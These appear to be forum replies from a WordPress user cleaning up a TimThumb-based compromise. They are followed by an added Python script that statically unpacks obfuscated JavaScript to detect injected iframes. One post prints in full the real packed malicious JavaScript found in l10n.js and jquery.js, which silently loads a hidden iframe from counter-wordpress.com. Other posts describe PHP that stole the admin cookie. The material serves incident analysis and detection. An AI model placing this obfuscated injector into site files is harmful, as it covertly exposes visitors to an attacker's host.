Elmo_is_evil
Forum Replies Created
OK, thank you!
Forum: Everything else WordPress
In reply to: [TimThumb Vulnerability] iframe hack
This may be a dumb question, but I can see counter-wordpress loading on my site. However, when I right click on the page to view source or try to view it in firebug, I can’t find an iframe or “counter” in the source code. Where is it, so I can know if it’s gone?
Because it’s loaded by a JS file… Clever way to hide this kind of thing ….
My WP installation is OK now. I didn’t delete and reinstall, but I basically did a byte-by-byte comparison of the file (with one of my backups, and the file from 3.2.1).
But anyway, in my case, the goal was to analyze what they did ….
The best way to be secure is obviously to delete and reinstall ….
(Sorry for my English this morning, still no coffee in the system …)
Forum: Plugins
In reply to: [WordPress HTTPS (SSL)] Two Strange Errors
Cool info Mvied, I will check with one of my dynamic IP VPNs …..
Forum: Everything else WordPress
In reply to: [TimThumb Vulnerability] iframe hack
Damn, sometimes I’m a tool, I just forgot to upload the clean wp-config.php ….
Anyway, still looking to be sure ….
Spirit_of_Martin, my PHP is a little bit rusty, but basically this bit of PHP gave the attacker the cookie of the admin in the first condition, the second looks like some kind of scanner/patcher, and the third a file downloader ….
My guess is that there’s a tool on top of it (on another server or computer) ….
Forum: Everything else WordPress
In reply to: [TimThumb Vulnerability] iframe hack
Got this as well after being affected by PHPRemoteView via timthumb ….
Now PHPRemoteView is gone, timthumb is up to date, but after removing it yesterday (in my case a JS), it came back this morning …
Mine was embedded in a JS, \wp-includes\js\l10n.js yesterday, and this morning \wp-includes\js\l10n.js and \wp-includes\js\jquery\jquery.js …. The code is obfuscated ….
I already mentioned it on a PHPRemoteView topic ….
http://wordpress.org/support/topic/two-strange-errors?replies=22#post-2289404
Forum: Plugins
In reply to: [WordPress HTTPS (SSL)] Two Strange Errors
Well, I’ve seen 2 other sites that got this, after being affected by the PHPRemoteView via timthumb ….
Forum: Plugins
In reply to: [WordPress HTTPS (SSL)] Two Strange Errors
Hello all, like many of you, one of my sites was affected by this crap…
But I’ve found something else after cleaning it, a little iframe, in a JavaScript (obfuscated), in my case it was in \wp-includes\js\l10n.js and \wp-includes\js\jquery\jquery.js ….
```
var _0x4de4=["\x64\x20\x35\x28\x29\x7B\x62\x20\x30\x3D\x32\x2E\x63\x28\x22\x33\x22\x29\x3B\x32\x2E\x39\x2E\x36\x28\x30\x29\x3B\x30\x2E\x37\x3D\x27\x33\x27\x3B\x30\x2E\x31\x2E\x61\x3D\x27\x34\x27\x3B\x30\x2E\x31\x2E\x6B\x3D\x27\x34\x27\x3B\x30\x2E\x69\x3D\x27\x66\x3A\x2F\x2F\x67\x2D\x68\x2E\x6D\x2F\x6A\x2E\x65\x27\x7D\x38\x28\x35\x2C\x6C\x29\x3B","\x7C","\x73\x70\x6C\x69\x74","\x65\x6C\x7C\x73\x74\x79\x6C\x65\x7C\x64\x6F\x63\x75\x6D\x65\x6E\x74\x7C\x69\x66\x72\x61\x6D\x65\x7C\x31\x70\x78\x7C\x4D\x61\x6B\x65\x46\x72\x61\x6D\x65\x7C\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64\x7C\x69\x64\x7C\x73\x65\x74\x54\x69\x6D\x65\x6F\x75\x74\x7C\x62\x6F\x64\x79\x7C\x77\x69\x64\x74\x68\x7C\x76\x61\x72\x7C\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x7C\x66\x75\x6E\x63\x74\x69\x6F\x6E\x7C\x70\x68\x70\x7C\x68\x74\x74\x70\x7C\x63\x6F\x75\x6E\x74\x65\x72\x7C\x77\x6F\x72\x64\x70\x72\x65\x73\x73\x7C\x73\x72\x63\x7C\x66\x72\x61\x6D\x65\x7C\x68\x65\x69\x67\x68\x74\x7C\x31\x30\x30\x30\x7C\x63\x6F\x6D","\x72\x65\x70\x6C\x61\x63\x65","","\x5C\x77\x2B","\x5C\x62","\x67"];eval(function (_0x2f46x1,_0x2f46x2,_0x2f46x3,_0x2f46x4,_0x2f46x5,_0x2f46x6){_0x2f46x5=function (_0x2f46x3){return _0x2f46x3.toString(36)};if(!_0x4de4[5][_0x4de4[4]](/^/,String)){while(_0x2f46x3--){_0x2f46x6[_0x2f46x3.toString(_0x2f46x2)]=_0x2f46x4[_0x2f46x3]||_0x2f46x3.toString(_0x2f46x2);}_0x2f46x4=[function (_0x2f46x5){return _0x2f46x6[_0x2f46x5]}];_0x2f46x5=function (){return _0x4de4[6]};_0x2f46x3=1;};while(_0x2f46x3--){if(_0x2f46x4[_0x2f46x3]){_0x2f46x1=_0x2f46x1[_0x4de4[4]]( new RegExp(_0x4de4[7]+_0x2f46x5(_0x2f46x3)+_0x4de4[7],_0x4de4[8]),_0x2f46x4[_0x2f46x3]);}}return _0x2f46x1}(_0x4de4[0],23,23,_0x4de4[3][_0x4de4[2]](_0x4de4[1]),0,{}));
```
And it basically adds an iframe going to: http://counter-wordpress.com/frame.php …. It’s obviously engineered to be stealthy … As it’s not showing in your HTML source, and is loaded by a WordPress JS, and it probably doesn’t do much at this moment (probably in standby) ….
Anyone else have this?
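
Added example, not part of the original posts: a static unpacker for scripts laid out like the snippet above, which recovers the hidden source as text without ever calling eval. It assumes the packed payload is the first hex-escaped string, the dictionary is the `|`-joined string, and the radix is the first number after `[0]`; all function names and the sample are constructed for illustration.

```python
import re

HEX_ESC = re.compile(r'\\x([0-9A-Fa-f]{2})')
STR_LIT = re.compile(r'"((?:\\x[0-9A-Fa-f]{2})+)"')    # fully hex-escaped literals
CALL = re.compile(r'\[0\]\s*,\s*(\d+)\s*,\s*\d+\s*,')  # (arr[0], radix, count, ...
DIGITS = "0123456789abcdefghijklmnopqrstuvwxyz"

def decode_hex(s):
    return HEX_ESC.sub(lambda m: chr(int(m.group(1), 16)), s)

def to_index(tok, radix):
    """Parse a packer token as a base-`radix` number; None if it is not one."""
    n = 0
    for ch in tok:
        d = DIGITS.find(ch)
        if d < 0 or d >= radix:
            return None
        n = n * radix + d
    return n

def unpack(payload, radix, words):
    """Undo the word substitution as plain text; nothing is evaluated."""
    def sub(m):
        i = to_index(m.group(0), radix)
        return words[i] if i is not None and i < len(words) and words[i] else m.group(0)
    return re.sub(r'\b\w+\b', sub, payload)

def analyze(js):
    """Return the unpacked source of a packed script, or None if not packed."""
    strings = [decode_hex(s) for s in STR_LIT.findall(js)]
    call = CALL.search(js)
    if len(strings) < 2 or not call:
        return None
    words = max(strings, key=lambda s: s.count("|")).split("|")
    return unpack(strings[0], int(call.group(1)), words)

def hex_escape(s):  # helper used only to build the constructed sample
    return "".join("\\x%02X" % ord(c) for c in s)

# Constructed sample (not the code from the post); example.invalid is a placeholder.
WORDS = ["el", "MakeFrame", "document", "function", "var", "createElement",
         "iframe", "src", "http", "example", "invalid"]
PACKED = "3 1(){4 0=2.5(\"6\");0.7='8://9.a/'}"
SAMPLE = 'var _0x1=["%s","%s","%s"];eval(function(){}(_0x1[0],11,11,_0x1[2]));' % (
    hex_escape(PACKED), hex_escape("|"), hex_escape("|".join(WORDS)))

if __name__ == "__main__":
    out = analyze(SAMPLE)
    print(out)
    print("injects iframe:", "createElement" in out and "iframe" in out)
```

Run over the contents of files such as l10n.js or jquery.js, a non-None result that mentions `createElement` and `iframe` marks a file to restore from a clean copy.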